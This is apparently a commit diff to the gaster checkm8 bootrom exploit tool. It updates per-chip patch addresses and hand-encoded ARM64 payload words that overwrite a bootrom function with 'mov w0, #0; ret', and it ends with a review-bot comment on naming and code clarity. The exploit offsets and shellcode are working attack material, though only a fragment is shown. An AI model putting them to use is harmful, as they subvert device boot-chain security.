Update
0x7ff committed Jun 12, 2022
1 parent 7ffffff commit 7ffffff
Showing 2 changed files with 21 additions and 19 deletions.
38 changes: 20 additions & 18 deletions gaster.c
@@ -647,7 +647,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
cpid = 0x8960;
config_large_leak = 7936;
config_overwrite_pad = 0x5C0;
patch_addr = 0x100005CE0;
patch_addr = 0x100005844;
memcpy_addr = 0x10000ED50;
aes_crypto_cmd = 0x10000B9A8;
boot_tramp_end = 0x1800E1000;
@@ -660,7 +660,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
usb_serial_number_string_descriptor = 0x180080562;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-1991.0.0.2.16]") != NULL) {
cpid = 0x7001;
patch_addr = 0x10000AD04;
patch_addr = 0x10000AA8C;
memcpy_addr = 0x100013F10;
aes_crypto_cmd = 0x100010A90;
io_buffer_addr = 0x18010D500;
@@ -676,7 +676,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
usb_serial_number_string_descriptor = 0x180080C2A;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-1992.0.0.1.19]") != NULL) {
cpid = 0x7000;
patch_addr = 0x100007E98;
patch_addr = 0x100007C20;
memcpy_addr = 0x100010E70;
aes_crypto_cmd = 0x10000DA90;
io_buffer_addr = 0x18010D300;
@@ -692,7 +692,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
usb_serial_number_string_descriptor = 0x18008062A;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-2234.0.0.2.22]") != NULL) {
cpid = 0x8003;
patch_addr = 0x10000812C;
patch_addr = 0x100007D38;
ttbr0_addr = 0x1800C8000;
memcpy_addr = 0x100011030;
aes_crypto_cmd = 0x10000DAA0;
@@ -710,7 +710,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
usb_serial_number_string_descriptor = 0x1800807DA;
} else if(strstr(usb_serial_num, " SRTG:[iBoot-2234.0.0.3.3]") != NULL) {
cpid = 0x8000;
patch_addr = 0x10000812C;
patch_addr = 0x100007D38;
ttbr0_addr = 0x1800C8000;
memcpy_addr = 0x100011030;
aes_crypto_cmd = 0x10000DAA0;
@@ -733,7 +733,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
tlbi = 0x100000404;
nop_gadget = 0x10000CD60;
ret_gadget = 0x100000118;
patch_addr = 0x100007668;
patch_addr = 0x100007188;
ttbr0_addr = 0x180050000;
func_gadget = 0x10000CD40;
write_ttbr0 = 0x1000003B4;
@@ -758,7 +758,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
tlbi = 0x100000434;
nop_gadget = 0x10000CC6C;
ret_gadget = 0x10000015C;
patch_addr = 0x1000074AC;
patch_addr = 0x100007044;
ttbr0_addr = 0x1800A0000;
func_gadget = 0x10000CC4C;
write_ttbr0 = 0x1000003E4;
@@ -783,7 +783,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
tlbi = 0x100000444;
nop_gadget = 0x10000CD0C;
ret_gadget = 0x100000148;
patch_addr = 0x100007630;
patch_addr = 0x100007188;
ttbr0_addr = 0x1800A0000;
func_gadget = 0x10000CCEC;
write_ttbr0 = 0x1000003F4;
@@ -808,7 +808,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
tlbi = 0x1000004AC;
nop_gadget = 0x10000A9C4;
ret_gadget = 0x100000148;
patch_addr = 0x10000624C;
patch_addr = 0x100005D70;
ttbr0_addr = 0x18000C000;
func_gadget = 0x10000A9AC;
write_ttbr0 = 0x10000045C;
@@ -833,7 +833,7 @@ checkm8_check_usb_device(usb_handle_t *handle, void *pwned) {
tlbi = 0x100000494;
nop_gadget = 0x100008DB8;
ret_gadget = 0x10000012C;
patch_addr = 0x100004854;
patch_addr = 0x100004378;
ttbr0_addr = 0x18000C000;
func_gadget = 0x100008DA0;
write_ttbr0 = 0x100000444;
@@ -1096,9 +1096,9 @@ checkm8_stage_patch(const usb_handle_t *handle) {
0xD63F0020, /* blr x1 */
0x58000321, /* ldr x1, =usb_serial_number_string_descriptor */
0x39000020, /* strb w0, [x1] */
0x52BA5002, /* mov w2, #0xD2800000 */
0x58000303, /* ldr x3, =patch_addr */
0xB9000062, /* str w2, [x3] */
0x58000323, /* ldr x3, =patch_addr */
0x58000342, /* ldr x2, =patch_val */
0xF9000062, /* str x2, [x3] */
0xA8C17BFD, /* ldp x29, x30, [sp], #0x10 */
0xD65F03C0 /* ret */
}, payload_A9[] = {
Expand Down Expand Up @@ -1135,9 +1135,9 @@ checkm8_stage_patch(const usb_handle_t *handle) {
0xD50E871F, /* tlbi alle3 */
0xD5033F9F, /* dsb sy */
0xD5033FDF, /* isb */
0x52BA5002, /* mov w2, #0xD2800000 */
0x58000403, /* ldr x3, =patch_addr */
0xB9000062, /* str w2, [x3] */
0x58000423, /* ldr x3, =patch_addr */
0x58000442, /* ldr x2, =patch_val */
0xF9000062, /* str x2, [x3] */
0xB2790021, /* orr x1, x1, #ARM_TTE_BLOCK_AP(AP_RONA) */
0xF9000001, /* str x1, [x0] */
0xD5033F9F, /* dsb sy */
@@ -1190,11 +1190,11 @@ checkm8_stage_patch(const usb_handle_t *handle) {
};
struct {
uint8_t payload[sizeof(payload_notA9)];
uint64_t pwnd[2], payload_dest, dfu_handle_request, payload_off, payload_sz, memcpy_addr, gUSBSerialNumber, usb_create_string_descriptor, usb_serial_number_string_descriptor, patch_addr;
uint64_t pwnd[2], payload_dest, dfu_handle_request, payload_off, payload_sz, memcpy_addr, gUSBSerialNumber, usb_create_string_descriptor, usb_serial_number_string_descriptor, patch_addr, patch_val;
} notA9;
struct {
uint8_t payload[sizeof(payload_A9)];
uint64_t pwnd[2], payload_dest, dfu_handle_request, payload_off, payload_sz, memcpy_addr, gUSBSerialNumber, usb_create_string_descriptor, usb_serial_number_string_descriptor, ttbr0_vrom_addr, patch_addr;
uint64_t pwnd[2], payload_dest, dfu_handle_request, payload_off, payload_sz, memcpy_addr, gUSBSerialNumber, usb_create_string_descriptor, usb_serial_number_string_descriptor, ttbr0_vrom_addr, patch_addr, patch_val;
} A9;
struct {
uint8_t payload[sizeof(payload_handle_checkm8_request)];
@@ -1247,6 +1247,7 @@ checkm8_stage_patch(const usb_handle_t *handle) {
A9.usb_serial_number_string_descriptor = usb_serial_number_string_descriptor;
A9.ttbr0_vrom_addr = ttbr0_addr + ttbr0_vrom_off;
A9.patch_addr = patch_addr;
A9.patch_val = 0xD65F03C052800000ULL;
memcpy(payload + payload_sz, &A9, sizeof(A9));
payload_sz += sizeof(A9);
} else {
@@ -1262,6 +1263,7 @@ checkm8_stage_patch(const usb_handle_t *handle) {
notA9.usb_create_string_descriptor = usb_create_string_descriptor;
notA9.usb_serial_number_string_descriptor = usb_serial_number_string_descriptor;
notA9.patch_addr = patch_addr;
notA9.patch_val = 0xD65F03C052800000ULL;
if(cpid == 0x8001 || cpid == 0x8010 || cpid == 0x8011 || cpid == 0x8012 || cpid == 0x8015) {
notA9.patch_addr += ARM_16K_TT_L2_SZ;
}
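Review bot: The new `patch_val` literal `0xD65F03C052800000ULL` is written twice, at `A9.patch_val` and `notA9.patch_val`, with no name or comment, while every word in the payload arrays above carries its disassembly. It is two little-endian A64 words (`0x52800000` low, `0xD65F03C0` high, the latter being the `ret` encoding already commented in the payload), so one definition such as `#define PATCH_VAL 0xD65F03C052800000ULL /* mov w0, #0; ret */` used in both assignments would keep them from drifting apart. The store in both payloads also widened from `str w2` to `str x2`, so eight bytes at `patch_addr` are now written instead of four, which is presumably why every per-SoC `patch_addr` moved; a short comment at the first of those assignments saying that the address must cover two instructions would make future table edits checkable. The hand-encoded `ldr x3, =patch_addr` / `ldr x2, =patch_val` literal offsets appear to rely on `patch_val` directly following `patch_addr` in both structs, which deserves a one-line comment on the struct declarations. Both `checkm8_check_usb_device` and `checkm8_stage_patch` start and end outside the hunks shown.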
2 changes: 1 addition & 1 deletion lzfse.c
@@ -86,7 +86,7 @@ typedef struct {
uint16_t literal_state[4];
int32_t lmd_bits;
uint16_t l_state, m_state, d_state, l_freq[LZFSE_ENCODE_L_SYMBOLS], m_freq[LZFSE_ENCODE_M_SYMBOLS], d_freq[LZFSE_ENCODE_D_SYMBOLS], literal_freq[LZFSE_ENCODE_LITERAL_SYMBOLS];
} __attribute__((__packed__,__aligned__(2))) lzfse_compressed_block_header_v1;
} __attribute__((__packed__, __aligned__(2))) lzfse_compressed_block_header_v1;

static const uint8_t l_extra_bits[LZFSE_ENCODE_L_SYMBOLS] = {
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 5, 8